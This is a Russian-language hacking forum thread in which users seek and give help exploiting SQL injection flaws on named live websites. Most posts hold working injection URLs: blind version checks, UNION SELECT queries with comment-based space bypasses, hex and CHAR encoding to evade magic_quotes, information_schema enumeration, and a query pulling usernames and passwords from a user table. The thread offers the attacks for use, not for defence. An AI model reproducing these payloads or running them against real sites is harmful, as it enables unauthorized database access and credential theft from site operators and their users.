Есть иньекция, все бы было хорошо, но имя базы содержит знак тире " - ", в итоге при from data-base.users вылазит ошибка в синтаксисе, как можно обойти?
Вечер добрый. Допустим есть такой сайт: http://www.site.ru/catalog/detailed/22/ Подставляю ' вылазит Mysql ошибка. Как данную уязвимость раскручивать?
Как и все остальные, разве что может получиться так, что придется делать без пробельный вариант или заменять их на /**/ например!
помогите уязвимость вроде есть а чёт не получается дальше раскрутить http://www.shpl.ru/shpage.php?menu=2343' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/shpl.d2/bib/set.inc on line 159
Code: http://www.shpl.ru/shpage.php?menu=2343) and mid(version(),1,1)=3 and (1=1 Версия 3, тогда небыло не UNION не даже подзапросов, так что только слепые методы тебе помогут!
Проблем может быть куча, начиная от magic_quotes и заканчивая не знанием путей, хотя последнее чаще всего решается!
Что посоветуете? Допустим нужно узнать привилегии но magic_quotes=on Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?
User - Future_future2 HEX - 0x4675747572655f66757475726532 CHAR(MySQL) - CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)
Спасибо за ответ.вот зачарено http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,117,114,101,50)-- Ответ SELECT command denied to user 'Future_future2'@'localhost' for table 'user' Вот хек http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532-- ответ SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
А матчасть почитать сначала??? Ясно же написано что вышеуказанный пользователь не имеет прав на доступ к системной таблице mysql!
Здравствуйте, помогите, туплю. http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15+from+information_schema.tables+--+ есть таблица ltw_usersv4, в ней есть колонка username, пытаюсь достать ее так: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+from+ltw_usersv4+limit+0,1+--+ и ничего не получаю. Что я делаю не так? Заранее благодарен.
Code: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,username,password),12,13,14,15+from+Marketing.ltw_usersv4--+ Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт!
FunOfGun, Code: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13,14,15+from+information_schema.tables+where+table_name='ltw_usersv4'+--+
вытаскивай просто таблицы подобными запросами: SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ Узнать текущую базу: SELECT database()
